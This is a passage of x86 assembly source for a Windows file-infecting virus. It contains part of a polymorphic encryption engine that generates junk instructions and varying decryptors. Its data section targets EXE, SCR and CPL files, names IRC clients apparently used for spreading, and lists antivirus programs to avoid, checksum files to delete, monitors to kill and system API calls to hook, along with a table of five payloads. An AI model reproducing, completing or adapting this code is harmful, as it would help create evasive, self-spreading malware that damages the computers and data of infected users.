|
|||
|
stosd
|
|||
|
loop THME_CD_EncryptLoop
|
|||
|
ret
|
|||
|
|
|||
|
THME_DoCryptOperations:
|
|||
|
test byte ptr [ebp+THME_CryptOp],_XOR
|
|||
|
jz THME_DCO_XOR
|
|||
|
test byte ptr [ebp+THME_CryptOp],_ADD
|
|||
|
jz THME_DCO_ADD
|
|||
|
THME_DCO_SUB:
|
|||
|
add eax,dword ptr [ebp+THME_Key1]
|
|||
|
jmp THME_DCO_EXIT
|
|||
|
THME_DCO_ADD:
|
|||
|
sub eax,dword ptr [ebp+THME_Key1]
|
|||
|
jmp THME_DCO_EXIT
|
|||
|
THME_DCO_XOR:
|
|||
|
xor eax,dword ptr [ebp+THME_Key1]
|
|||
|
THME_DCO_EXIT:
|
|||
|
ret
|
|||
|
|
|||
|
; ---
|
|||
|
|
|||
|
THME_GenDeltaOffset: ; CALL @@1
|
|||
|
mov eax,10h ; ...
|
|||
|
call r_range ; @@1:
|
|||
|
xchg eax,ebx ; POP E??
|
|||
|
mov al,0E8h
|
|||
|
stosb
|
|||
|
xor eax,eax
|
|||
|
stosd
|
|||
|
mov dword ptr [ebp+THME_GDO_TmpCll],edi
|
|||
|
call THME_GenGarbage
|
|||
|
mov ecx,dword ptr [ebp+THME_GDO_TmpCll]
|
|||
|
mov ebx,edi
|
|||
|
sub ebx,ecx
|
|||
|
mov [ecx-4],ebx
|
|||
|
mov al,58h
|
|||
|
add al,byte ptr [ebp+THME_DeltaReg]
|
|||
|
stosb
|
|||
|
mov ebx,dword ptr [ebp+THME_Pointer]
|
|||
|
sub ecx,ebx
|
|||
|
mov dword ptr [ebp+THME_Fix1],ecx
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenLoadSize:
|
|||
|
mov eax,2
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GLS_@@2
|
|||
|
THME_GLS_@@1:
|
|||
|
mov al,68h ; PUSH ????????
|
|||
|
; ...
|
|||
|
stosb ; POP E??
|
|||
|
mov eax,dword ptr [ebp+THME_S2C_div4]
|
|||
|
stosd
|
|||
|
call THME_GenGarbage
|
|||
|
mov al,58h
|
|||
|
add al,byte ptr [ebp+THME_CounterReg]
|
|||
|
stosb
|
|||
|
ret
|
|||
|
THME_GLS_@@2:
|
|||
|
movzx eax,byte ptr [ebp+THME_CounterReg]
|
|||
|
add eax,0B8h ; MOV E??,????????
|
|||
|
stosb
|
|||
|
mov eax,dword ptr [ebp+THME_S2C_div4]
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenLoadPointer:
|
|||
|
mov al,8Dh ; LEA E??,[E??+????????]
|
|||
|
stosb
|
|||
|
movzx eax,byte ptr [ebp+THME_PointerReg]
|
|||
|
shl al,3
|
|||
|
add al,10000000b
|
|||
|
add al,byte ptr [ebp+THME_DeltaReg]
|
|||
|
stosb
|
|||
|
mov eax,LIMIT
|
|||
|
sub eax,dword ptr [ebp+THME_Fix1]
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_StoreLoop:
|
|||
|
mov dword ptr [ebp+THME_LoopAddress],edi
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenCryptOperations:
|
|||
|
mov al,81h
|
|||
|
stosb
|
|||
|
test byte ptr [ebp+THME_CryptOp],_XOR
|
|||
|
jz THME_GCO_XOR
|
|||
|
test byte ptr [ebp+THME_CryptOp],_ADD
|
|||
|
jz THME_GCO_ADD
|
|||
|
THME_GCO_SUB:
|
|||
|
mov al,28h ; SUB [E??],????????
|
|||
|
jmp THME_GCO_BuildRiB
|
|||
|
THME_GCO_ADD:
|
|||
|
xor al,al ; ADD [E??],????????
|
|||
|
jmp THME_GCO_BuildRiB
|
|||
|
THME_GCO_XOR:
|
|||
|
mov al,30h ; XOR [E??],????????
|
|||
|
THME_GCO_BuildRiB:
|
|||
|
add al,byte ptr [ebp+THME_PointerReg]
|
|||
|
cmp byte ptr [ebp+THME_PointerReg],_EBP
|
|||
|
jnz THME_GCO_BR_NoEBP
|
|||
|
or al,01000000b
|
|||
|
stosb
|
|||
|
xor al,al
|
|||
|
stosb
|
|||
|
jmp $+3
|
|||
|
THME_GCO_BR_NoEBP:
|
|||
|
stosb
|
|||
|
call random
|
|||
|
mov dword ptr [ebp+THME_Key1],eax
|
|||
|
stosd
|
|||
|
THME_GCO_EXIT:
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenIncPointer:
|
|||
|
mov eax,5
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GIP_@@2
|
|||
|
dec ecx
|
|||
|
jecxz THME_GIP_@@3
|
|||
|
dec ecx
|
|||
|
jecxz THME_GIP_@@4
|
|||
|
dec ecx
|
|||
|
jnz THME_GIP_@@1
|
|||
|
jmp THME_GIP_@@5
|
|||
|
|
|||
|
THME_GIP_@@1:
|
|||
|
mov bl,4 ; ADD E??,4
|
|||
|
call THME_GIP_AddIt
|
|||
|
jmp THME_GIP_EXIT
|
|||
|
|
|||
|
THME_GIP_@@2:
|
|||
|
mov eax,2
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GIP_@@2_@@2
|
|||
|
THME_GIP_@@2_@@1:
|
|||
|
mov bl,3 ; ADD E??,3
|
|||
|
call THME_GIP_AddIt
|
|||
|
mov bl,1 ; INC E??
|
|||
|
call THME_GIP_IncIt
|
|||
|
jmp THME_GIP_@@2_EXIT
|
|||
|
THME_GIP_@@2_@@2:
|
|||
|
mov bl,1 ; INC E??
|
|||
|
call THME_GIP_IncIt
|
|||
|
mov bl,3
|
|||
|
call THME_GIP_AddIt ; ADD E??,3
|
|||
|
THME_GIP_@@2_EXIT:
|
|||
|
jmp THME_GIP_EXIT
|
|||
|
|
|||
|
THME_GIP_@@3:
|
|||
|
mov eax,2
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GIP_@@3_@@2
|
|||
|
THME_GIP_@@3_@@1:
|
|||
|
mov bl,2 ; ADD E??,2
|
|||
|
call THME_GIP_AddIt
|
|||
|
mov bl,2 ; INC E??
|
|||
|
call THME_GIP_IncIt ; INC E??
|
|||
|
jmp THME_GIP_@@2_EXIT
|
|||
|
THME_GIP_@@3_@@2:
|
|||
|
mov bl,2 ; INC E??
|
|||
|
call THME_GIP_IncIt ; INC E??
|
|||
|
mov bl,2 ; ADD E??,2
|
|||
|
call THME_GIP_AddIt
|
|||
|
jmp THME_GIP_@@2_EXIT
|
|||
|
|
|||
|
THME_GIP_@@4:
|
|||
|
mov eax,2
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GIP_@@4_@@2
|
|||
|
THME_GIP_@@4_@@1:
|
|||
|
mov bl,1 ; ADD E??,1
|
|||
|
call THME_GIP_AddIt ; INC E??
|
|||
|
mov bl,3 ; INC E??
|
|||
|
call THME_GIP_IncIt ; INC E??
|
|||
|
jmp THME_GIP_@@2_EXIT
|
|||
|
THME_GIP_@@4_@@2:
|
|||
|
mov bl,1 ; INC E??
|
|||
|
call THME_GIP_IncIt ; INC E??
|
|||
|
mov bl,3 ; INC E??
|
|||
|
call THME_GIP_AddIt ; ADD E??,1
|
|||
|
jmp THME_GIP_@@2_EXIT
|
|||
|
|
|||
|
THME_GIP_@@5: ; INC E??
|
|||
|
mov bl,4 ; INC E??
|
|||
|
call THME_GIP_IncIt ; INC E??
|
|||
|
; INC E??
|
|||
|
|
|||
|
THME_GIP_EXIT:
|
|||
|
ret
|
|||
|
|
|||
|
THME_GIP_AddIt:
|
|||
|
mov al,83h
|
|||
|
stosb
|
|||
|
mov al,byte ptr [ebp+THME_PointerReg]
|
|||
|
or al,11000000b
|
|||
|
stosb
|
|||
|
mov al,bl
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GIP_IncIt:
|
|||
|
movzx ecx,bl
|
|||
|
mov al,40h
|
|||
|
add al,byte ptr [ebp+THME_PointerReg]
|
|||
|
THME_GIP_II_Loop:
|
|||
|
stosb
|
|||
|
pushad
|
|||
|
call THME_GenGarbage
|
|||
|
popad
|
|||
|
loop THME_GIP_II_Loop
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenDecCounter:
|
|||
|
mov eax,3
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GDC_@@2
|
|||
|
dec ecx
|
|||
|
jecxz THME_GDC_@@3
|
|||
|
THME_GDC_@@1: ; SUB E??,1
|
|||
|
mov al,83h
|
|||
|
stosb
|
|||
|
mov al,byte ptr [ebp+THME_CounterReg]
|
|||
|
or al,11101000b
|
|||
|
stosb
|
|||
|
mov al,1
|
|||
|
stosb
|
|||
|
jmp THME_GDC_EXIT
|
|||
|
THME_GDC_@@2:
|
|||
|
mov al,48h ; DEC E??
|
|||
|
add al,byte ptr [ebp+THME_CounterReg]
|
|||
|
stosb
|
|||
|
jmp THME_GDC_EXIT
|
|||
|
THME_GDC_@@3:
|
|||
|
mov al,83h ; ADD E??,-1
|
|||
|
stosb
|
|||
|
mov al,byte ptr [ebp+THME_CounterReg]
|
|||
|
or al,11000000b
|
|||
|
stosb
|
|||
|
mov al,0FFh
|
|||
|
stosb
|
|||
|
THME_GDC_EXIT:
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenLoop:
|
|||
|
mov ax,850Fh ; JNZ FAR ????????
|
|||
|
stosw
|
|||
|
mov eax,dword ptr [ebp+THME_LoopAddress]
|
|||
|
sub eax,edi
|
|||
|
sub eax,00000004h
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_OneByters label byte
|
|||
|
cld
|
|||
|
cmc
|
|||
|
clc
|
|||
|
stc
|
|||
|
dec eax
|
|||
|
inc eax
|
|||
|
lahf
|
|||
|
nop
|
|||
|
salc
|
|||
|
sTHME_OneByters equ ($-THME_OneByters)
|
|||
|
|
|||
|
THME_Copro label byte
|
|||
|
f2xm1
|
|||
|
fabs
|
|||
|
fadd
|
|||
|
faddp
|
|||
|
fchs
|
|||
|
fnclex
|
|||
|
fcom
|
|||
|
fcomp
|
|||
|
fcompp
|
|||
|
fcos
|
|||
|
fdecstp
|
|||
|
fdiv
|
|||
|
fdivp
|
|||
|
fdivr
|
|||
|
fdivrp
|
|||
|
ffree
|
|||
|
fincstp
|
|||
|
fld1
|
|||
|
fldl2t
|
|||
|
fldl2e
|
|||
|
fldpi
|
|||
|
fldln2
|
|||
|
fldz
|
|||
|
fmul
|
|||
|
fmulp
|
|||
|
fnclex
|
|||
|
fnop
|
|||
|
fpatan
|
|||
|
fprem
|
|||
|
fprem1
|
|||
|
fptan
|
|||
|
frndint
|
|||
|
fscale
|
|||
|
fsin
|
|||
|
fsincos
|
|||
|
fsqrt
|
|||
|
fst
|
|||
|
fstp
|
|||
|
fsub
|
|||
|
fsubp
|
|||
|
fsubr
|
|||
|
fsubrp
|
|||
|
ftst
|
|||
|
fucom
|
|||
|
fucomp
|
|||
|
fucompp
|
|||
|
fxam
|
|||
|
fxtract
|
|||
|
fyl2x
|
|||
|
fyl2xp1
|
|||
|
sTHME_Copro equ (($-THME_Copro)/2)
|
|||
|
|
|||
|
; Possibilities before crypt operation
|
|||
|
|
|||
|
THME_Decrypt1 label byte
|
|||
|
dd offset (THME_Decrypt1a)
|
|||
|
dd offset (THME_Decrypt1b)
|
|||
|
dd offset (THME_Decrypt1c)
|
|||
|
sTHME_Decrypt1 equ (($-THME_Decrypt1)/4)
|
|||
|
|
|||
|
THME_Decrypt1a label byte
|
|||
|
dd offset (THME_GenDeltaOffset)
|
|||
|
dd offset (THME_GenLoadSize)
|
|||
|
dd offset (THME_GenLoadPointer)
|
|||
|
sTHME_Decrypt1a equ (($-THME_Decrypt1a)/4)
|
|||
|
|
|||
|
THME_Decrypt1b label byte
|
|||
|
dd offset (THME_GenDeltaOffset)
|
|||
|
dd offset (THME_GenLoadPointer)
|
|||
|
dd offset (THME_GenLoadSize)
|
|||
|
sTHME_Decrypt1b equ (($-THME_Decrypt1b)/4)
|
|||
|
|
|||
|
THME_Decrypt1c label byte
|
|||
|
dd offset (THME_GenLoadSize)
|
|||
|
dd offset (THME_GenDeltaOffset)
|
|||
|
dd offset (THME_GenLoadPointer)
|
|||
|
sTHME_Decrypt1c equ (($-THME_Decrypt1c)/4)
|
|||
|
|
|||
|
; Main table (for garbage generation)
|
|||
|
|
|||
|
THME_GBG_Table label byte
|
|||
|
dd offset (THME_GBG_Arithmetic_EAX_IMM32)
|
|||
|
dd offset (THME_GBG_Arithmetic_REG32_REG32)
|
|||
|
dd offset (THME_GBG_Arithmetic_REG32_IMM32)
|
|||
|
dd offset (THME_GBG_MOV_REG16_REG16)
|
|||
|
dd offset (THME_GBG_MOV_REG16_IMM16)
|
|||
|
dd offset (THME_GBG_MOV_REG32_REG32)
|
|||
|
dd offset (THME_GBG_MOV_REG32_IMM32)
|
|||
|
dd offset (THME_GBG_GenOneByter)
|
|||
|
dd offset (THME_GBG_GenCopro)
|
|||
|
dd offset (THME_GBG_GenPUSHPOP)
|
|||
|
dd offset (THME_GBG_GenCALL_Type1)
|
|||
|
sTHME_GBG_Table equ (($-THME_GBG_Table)/4)
|
|||
|
|
|||
|
thme_end label byte
|
|||
|
|
|||
|
THME endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Random procedures
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; RANDOM
|
|||
|
;
|
|||
|
; input:
|
|||
|
; Nothing.
|
|||
|
; output:
|
|||
|
; EAX = Random number
|
|||
|
;
|
|||
|
|
|||
|
random proc ; Thanx MDriller! ;)
|
|||
|
push ecx
|
|||
|
mov eax,dword ptr [ebp+rnd_seed1]
|
|||
|
dec dword ptr [ebp+rnd_seed1]
|
|||
|
xor eax,dword ptr [ebp+rnd_seed2]
|
|||
|
mov ecx,eax
|
|||
|
rol dword ptr [ebp+rnd_seed1],cl
|
|||
|
add dword ptr [ebp+rnd_seed2],eax
|
|||
|
adc eax,dword ptr [ebp+rnd_seed2]
|
|||
|
add eax,ecx
|
|||
|
ror eax,cl
|
|||
|
not eax
|
|||
|
sub eax,3
|
|||
|
xor dword ptr [ebp+rnd_seed2],eax
|
|||
|
xor eax,dword ptr [ebp+rnd_seed3]
|
|||
|
rol dword ptr [ebp+rnd_seed3],1
|
|||
|
sub dword ptr [ebp+rnd_seed3],ecx
|
|||
|
sbb dword ptr [ebp+rnd_seed3],4
|
|||
|
inc dword ptr [ebp+rnd_seed2]
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
random endp
|
|||
|
|
|||
|
; R_RANGE
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EAX = Number of possible random numbers
|
|||
|
; output:
|
|||
|
; EAX = Number between 0 and (EAX-1)
|
|||
|
|
|||
|
r_range proc
|
|||
|
push ecx
|
|||
|
push edx
|
|||
|
mov ecx,eax
|
|||
|
call random
|
|||
|
xor edx,edx
|
|||
|
div ecx
|
|||
|
mov eax,edx
|
|||
|
pop edx
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
r_range endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Virus data
|
|||
|
; ===========================================================================
|
|||
|
; I went to god just to see, and i was looking at me.
|
|||
|
|
|||
|
_MASK db "*."
|
|||
|
EXTENSION dd 00000000h
|
|||
|
|
|||
|
EXTENSIONS db "EXE",0 ; Nice table: very easy to
|
|||
|
db "SCR",0 ; add new extensions to infect
|
|||
|
db "CPL",0
|
|||
|
n_EXT equ (($-offset EXTENSIONS)/4)
|
|||
|
|
|||
|
ALL_MASK db "*.*",0
|
|||
|
|
|||
|
dotdot db "..",0
|
|||
|
root db "c:\",0 ; Don't be afraid... :)
|
|||
|
|
|||
|
key_mIRC db "iKX\Thorin\mIRC32",0
|
|||
|
key_PIRCH db "iKX\Thorin\Pirch32",0
|
|||
|
key_ViRC97 db "iKX\Thorin\ViRC97",0
|
|||
|
|
|||
|
; Whoaaaaa... many many many payloads!
|
|||
|
|
|||
|
payload_table label byte
|
|||
|
dd offset (payload1)
|
|||
|
dd offset (payload2)
|
|||
|
dd offset (payload3)
|
|||
|
dd offset (payload4)
|
|||
|
dd offset (payload5)
|
|||
|
payload_number equ (($-offset payload_table)/4)
|
|||
|
|
|||
|
infections dd 00000000h
|
|||
|
imagebase dd imagebase_
|
|||
|
kernel dd kernel_
|
|||
|
|
|||
|
K32_DLL db "KERNEL32.dll",0
|
|||
|
K32_Size equ $-K32_DLL
|
|||
|
|
|||
|
szSHELL32 db "SHELL32",0
|
|||
|
szUSER32 db "USER32",0
|
|||
|
szADVAPI32 db "ADVAPI32",0
|
|||
|
|
|||
|
szOPEN db "OPEN",0
|
|||
|
szMicro$oft db "http://www.microsoft.com",0 ; Yaaaaaaargh!!!
|
|||
|
|
|||
|
; @@BadProgramz structure
|
|||
|
; ???????????????????????
|
|||
|
; +02h String Size
|
|||
|
; +??h First letters (string size) of files we don't want to be infected
|
|||
|
|
|||
|
@@BadProgramz label byte
|
|||
|
db 02h,"TB" ; ThunderByte?
|
|||
|
db 02h,"F-" ; F-Prot?
|
|||
|
db 03h,"NAV" ; Norton Antivirus?
|
|||
|
db 03h,"AVP" ; AVP?
|
|||
|
db 03h,"WEB" ; DrWeb?
|
|||
|
db 03h,"PAV" ; Panda?
|
|||
|
db 03h,"DRW" ; DrWeb?
|
|||
|
db 04h,"DSAV" ; Dr Solomon?
|
|||
|
db 03h,"NOD" ; Nod-Ice?
|
|||
|
db 06h,"WINICE" ; SoftIce?
|
|||
|
db 06h,"FORMAT" ; Format?
|
|||
|
db 05h,"FDISK" ; Fdisk?
|
|||
|
db 08h,"SCANDSKW" ; ScanDisk?
|
|||
|
db 06h,"DEFRAG" ; Defrag?
|
|||
|
db 0BBh
|
|||
|
|
|||
|
@@BadPhilez label byte ; Files to delete in all dirz
|
|||
|
ANTIVIR_DAT db "ANTI-VIR.DAT",0
|
|||
|
CHKLIST_DAT db "CHKLIST.DAT",0
|
|||
|
CHKLIST_TAV db "CHKLIST.TAV",0
|
|||
|
CHKLIST_MS db "CHKLIST.MS",0
|
|||
|
CHKLIST_CPS db "CHKLIST.CPS",0
|
|||
|
AVP_CRC db "AVP.CRC",0
|
|||
|
IVB_NTZ db "IVB.NTZ",0
|
|||
|
SMARTCHK_MS db "SMARTCHK.MS",0
|
|||
|
SMARTCHK_CPS db "SMARTCHK.CPS",0
|
|||
|
|
|||
|
Monitors2Kill label byte
|
|||
|
db "AVP Monitor",0
|
|||
|
db "Amon Antivirus Monitor",0
|
|||
|
db 0BBh
|
|||
|
|
|||
|
|
|||
|
; @@Hookz structure
|
|||
|
; ?????????????????
|
|||
|
; +00h API Name
|
|||
|
; +??h Bytes from beginning of virus until beginning of hook handler
|
|||
|
|
|||
|
@@Hookz label byte
|
|||
|
?szMoveFileA db "MoveFileA",0
|
|||
|
?hnMoveFileA dd (offset HookMoveFileA)
|
|||
|
|
|||
|
?szCopyFileA db "CopyFileA",0
|
|||
|
?hnCopyFileA dd (offset HookCopyFileA)
|
|||
|
|
|||
|
?szGetFullPathNameA db "GetFullPathNameA",0
|
|||
|
?hnGetFullPathNameA dd (offset HookGetFullPathNameA)
|
|||
|
|
|||
|
?szDeleteFileA db "DeleteFileA",0
|
|||
|
?hnDeleteFileA dd (offset HookDeleteFileA)
|
|||
|
|
|||
|
?szWinExec db "WinExec",0
|
|||
|
?hnWinExec dd (offset HookWinExec)
|
|||
|
|
|||
|
?szCreateProcessA db "CreateProcessA",0
|
|||
|
?hnCreateProcessA dd (offset HookCreateProcessA)
|
|||
|
|
|||
|
?szCreateFileA db "CreateFileA",0
|
|||
|
?hnCreateFileA dd (offset HookCreateFileA)
|
|||
|
|
|||
|
?szGetFileAttributesA db "GetFileAttributesA",0
|
|||
|
?hnGetFileAttributesA dd (offset HookGetFileAttributesA)
|
|||
|
|
|||
|
?szFindFirstFileA db "FindFirstFileA",0
|
|||
|
?hnFindFirstFileA dd (offset HookFindFirstFileA)
|
|||
|
|
|||
|
?szFindNextFileA db "FindNextFileA",0
|
|||
|
?hnFindNextFileA dd (offset HookFindNextFileA)
|
|||
|
|
|||
|
?szHookGetProcAddress db "GetProcAddress",0
|
|||
|
?hnHookGetProcAddress dd (offset HookGetProcAddress)
|
|||
|
|
|||
|
db "" ; How funny ;)
|
|||
|
|
|||
|
@IsDebuggerPresent db "IsDebuggerPresent",0
|
|||
|
|
|||
|
; Hrm, i think i should write some compression engine for that API shit :)
|
|||
|
|
|||
|
@@Namez label byte
|
|||
|
@GetModuleHandleA db "GetModuleHandleA",0
|
|||
|
@LoadLibraryA db "LoadLibraryA",0
|
|||
|
@FindClose db "FindClose",0
|
|||
|
@SetFilePointer db "SetFilePointer",0
|
|||
|
@SetFileAttributesA db "SetFileAttributesA",0
|
|||
|
@CloseHandle db "CloseHandle",0
|
|||
|
@GetCurrentDirectoryA db "GetCurrentDirectoryA",0
|
|||
|
@SetCurrentDirectoryA db "SetCurrentDirectoryA",0
|
|||
|
@GetWindowsDirectoryA db "GetWindowsDirectoryA",0
|
|||
|
@GetSystemDirectoryA db "GetSystemDirectoryA",0
|
|||
|
@CreateFileMappingA db "CreateFileMappingA",0
|
|||
|
@MapViewOfFile db "MapViewOfFile",0
|
|||
|
@UnmapViewOfFile db "UnmapViewOfFile",0
|
|||
|
@SetEndOfFile db "SetEndOfFile",0
|
|||
|
@WriteFile db "WriteFile",0
|
|||
|
@GetTickCount db "GetTickCount",0
|
|||
|
@GetVersion db "GetVersion",0
|
|||
|
@GlobalAlloc db "GlobalAlloc",0
|
|||
|
@GlobalFree db "GlobalFree",0
|
|||
|
@GetFileSize db "GetFileSize",0
|
|||
|
@SetVolumeLabelA db "SetVolumeLabelA",0
|
|||
|
@GetSystemTime db "GetSystemTime",0
|
|||
|
|
|||
|
@@HookedNamez label byte
|
|||
|
@MoveFileA db "MoveFileA",0
|
|||
|
@CopyFileA db "CopyFileA",0
|
|||
|
@GetFullPathNameA db "GetFullPathNameA",0
|
|||
|
@DeleteFileA db "DeleteFileA",0
|
|||
|
@WinExec db "WinExec",0
|
|||
|
@CreateProcessA db "CreateProcessA",0
|
|||
|
@CreateFileA db "CreateFileA",0
|
|||
|
@GetFileAttributesA db "GetFileAttributesA",0
|
|||
|
@FindFirstFileA db "FindFirstFileA",0
|
|||
|
@FindNextFileA db "FindNextFileA",0
|
|||
|
@GetProcAddress db "GetProcAddress",0
|
|||
|
db 0BBh ; I rule! :)
|
|||
|
|
|||
|
@@USER32_APIs label byte
|
|||
|
@SwapMouseButton db "SwapMouseButton",0
|
|||
|
@MessageBoxA db "MessageBoxA",0
|
|||
|
@FindWindowA db "FindWindowA",0
|
|||
|
@PostMessageA db "PostMessageA",0
|
|||
|
db "" ; I like girls...
|
|||
|
|
|||
|
@@ADVAPI32_APIs label byte
|
|||
|
@RegCreateKeyExA db "RegCreateKeyExA",0
|
|||
|
@RegOpenKeyExA db "RegOpenKeyExA",0
|
|||
|
@RegDeleteKeyA db "RegDeleteKeyA",0
|
|||
|
db "" ; And music tho :)
|
|||
|
|
|||
|
@@SHELL32_APIs label byte
|
|||
|
@ShellExecuteA db "ShellExecuteA",0
|
|||
|
|
|||
|
random_seed label byte
|
|||
|
rnd_seed1 dd 00000000h
|
|||
|
rnd_seed2 dd 00000000h
|
|||
|
rnd_seed3 dd 00000000h
|
|||
|
dd 00000000h
|
|||
|
|
|||
|
; THME Poly Engine data
|
|||
|
|
|||
|
THME_CounterReg db 00h
|
|||
|
THME_PointerReg db 00h
|
|||
|
THME_DeltaReg db 00h
|
|||
|
|
|||
|
THME_CoproInit db 00h
|
|||
|
THME_CryptOp db 00h
|
|||
|
|
|||
|
THME_Recursion db 00h
|
|||
|
THME_LoopAddress db 00000000h
|
|||
|
THME_CryptKey dd 00000000h
|
|||
|
THME_Pointer dd 00000000h
|
|||
|
THME_Data2crypt dd 00000000h
|
|||
|
THME_Size2crypt dd 00000000h
|
|||
|
THME_S2C_div4 dd 00000000h
|
|||
|
THME_GDO_TmpCll dd 00000000h
|
|||
|
THME_Fix1 dd 00000000h
|
|||
|
THME_Key1 dd 00000000h ; ADD/SUB/XOR key
|
|||
|
|
|||
|
; Virus data
|
|||
|
|
|||
|
NewSize dd 00000000h
|
|||
|
SearchHandle dd 00000000h
|
|||
|
FileHandle dd 00000000h
|
|||
|
MapHandle dd 00000000h
|
|||
|
MapAddress dd 00000000h
|
|||
|
AddressTableVA dd 00000000h
|
|||
|
NameTableVA dd 00000000h
|
|||
|
OrdinalTableVA dd 00000000h
|
|||
|
TempGA_IT1 dd 00000000h
|
|||
|
TempGA_IT2 dd 00000000h
|
|||
|
TempHandle dd 00000000h
|
|||
|
iobytes dd 00000000h,00000000h,00000000h,00000000h,00000000h
|
|||
|
GlobalAllocHnd dd 00000000h
|
|||
|
GlobalAllocHnd_ dd 00000000h
|
|||
|
TSHandle dd 00000000h
|
|||
|
RegHandle dd 00000000h
|
|||
|
Disposition dd 00000000h
|
|||
|
lpFilePart dd 00000000h
|
|||
|
WFD_HndInMem dd 00000000h
|
|||
|
WFD_Handles_Count db 00h
|
|||
|
CoolFlag db 00h
|
|||
|
inNT db 00h
|
|||
|
CurrentExt db 00h
|
|||
|
|
|||
|
tempcurdir db 7Fh dup (00h)
|
|||
|
|
|||
|
@@Offsetz label byte
|
|||
|
_GetModuleHandleA dd 00000000h
|
|||
|
_LoadLibraryA dd 00000000h
|
|||
|
_FindClose dd 00000000h
|
|||
|
_SetFilePointer dd 00000000h
|
|||
|
_SetFileAttributesA dd 00000000h
|
|||
|
_CloseHandle dd 00000000h
|
|||
|
_GetCurrentDirectoryA dd 00000000h
|
|||
|
_SetCurrentDirectoryA dd 00000000h
|
|||
|
_GetWindowsDirectoryA dd 00000000h
|
|||
|
_GetSystemDirectoryA dd 00000000h
|
|||
|
_CreateFileMappingA dd 00000000h
|
|||
|
_MapViewOfFile dd 00000000h
|
|||
|
_UnmapViewOfFile dd 00000000h
|
|||
|
_SetEndOfFile dd 00000000h
|
|||
|
_WriteFile dd 00000000h
|
|||
|
_GetTickCount dd 00000000h
|
|||
|
_GetVersion dd 00000000h
|
|||
|
_GlobalAlloc dd 00000000h
|
|||
|
_GlobalFree dd 00000000h
|
|||
|
_GetFileSize dd 00000000h
|
|||
|
_SetVolumeLabelA dd 00000000h
|
|||
|
_GetSystemTime dd 00000000h
|
|||
|
@@HookedOffsetz label byte
|
|||
|
_MoveFileA dd 00000000h
|
|||
|
_CopyFileA dd 00000000h
|
|||
|
_GetFullPathNameA dd 00000000h
|
|||
|
_DeleteFileA dd 00000000h
|
|||
|
_WinExec dd 00000000h
|
|||
|
_CreateProcessA dd 00000000h
|
|||
|
_CreateFileA dd 00000000h
|
|||
|
_GetFileAttributesA dd 00000000h
|
|||
|
_FindFirstFileA dd 00000000h
|
|||
|
_FindNextFileA dd 00000000h
|
|||
|
_GetProcAddress dd 00000000h
|
|||
|
n_HookedAPIs equ (($-@@HookedOffsetz)/4)
|
|||
|
|
|||
|
|
|||
|
@@USER32_Addresses label byte
|
|||
|
_SwapMouseButton dd 00000000h
|
|||
|
_MessageBoxA dd 00000000h
|
|||
|
_FindWindowA dd 00000000h
|
|||
|
_PostMessageA dd 00000000h
|
|||
|
|
|||
|
@@ADVAPI32_Addresses label byte
|
|||
|
_RegCreateKeyExA dd 00000000h
|
|||
|
_RegOpenKeyExA dd 00000000h
|
|||
|
_RegDeleteKeyA dd 00000000h
|
|||
|
|
|||
|
MAX_PATH equ 260
|
|||
|
|
|||
|
FILETIME STRUC
|
|||
|
FT_dwLowDateTime dd ?
|
|||
|
FT_dwHighDateTime dd ?
|
|||
|
FILETIME ENDS
|
|||
|
|
|||
|
WIN32_FIND_DATA label byte
|
|||
|
WFD_dwFileAttributes dd ?
|
|||
|
WFD_ftCreationTime FILETIME ?
|
|||
|
WFD_ftLastAccessTime FILETIME ?
|
|||
|
WFD_ftLastWriteTime FILETIME ?
|
|||
|
WFD_nFileSizeHigh dd ?
|
|||
|
WFD_nFileSizeLow dd ?
|
|||
|
WFD_dwReserved0 dd ?
|
|||
|
WFD_dwReserved1 dd ?
|
|||
|
WFD_szFileName db MAX_PATH dup (?)
|
|||
|
WFD_szAlternateFileName db 13 dup (?)
|
|||
|
db 03 dup (?)
|
|||
|
|
|||
|
_WIN32_FIND_DATA label byte
|
|||
|
_WFD_dwFileAttributes dd ?
|
|||
|
_WFD_ftCreationTime FILETIME ?
|
|||
|
_WFD_ftLastAccessTime FILETIME ?
|
|||
|
_WFD_ftLastWriteTime FILETIME ?
|
|||
|
_WFD_nFileSizeHigh dd ?
|
|||
|
_WFD_nFileSizeLow dd ?
|
|||
|
_WFD_dwReserved0 dd ?
|
|||
|
_WFD_dwReserved1 dd ?
|
|||
|
_WFD_szFileName db MAX_PATH dup (?)
|
|||
|
_WFD_szAlternateFileName db 13 dup (?)
|
|||
|
db 03 dup (?)
|
|||
|
|
|||
|
SYSTEMTIME label byte
|
|||
|
ST_wYear dw ?
|
|||
|
ST_wMonth dw ?
|
|||
|
ST_wDayOfWeek dw ?
|
|||
|
ST_wDay dw ?
|
|||
|
ST_wHour dw ?
|
|||
|
ST_wMinute dw ?
|
|||
|
ST_wSecond dw ?
|
|||
|
ST_wMilliseconds dw ?
|
|||
|
|
|||
|
|
|||
|
directories label byte
|
|||
|
|
|||
|
WindowsDir db 7Fh dup (00h)
|
|||
|
SystemDir db 7Fh dup (00h)
|
|||
|
OriginDir db 7Fh dup (00h)
|
|||
|
dirs2inf equ (($-directories)/7Fh)
|
|||
|
mirrormirror db dirs2inf
|
|||
|
|
|||
|
align dword
|
|||
|
|
|||
|
crypt_end label byte
|
|||
|
|
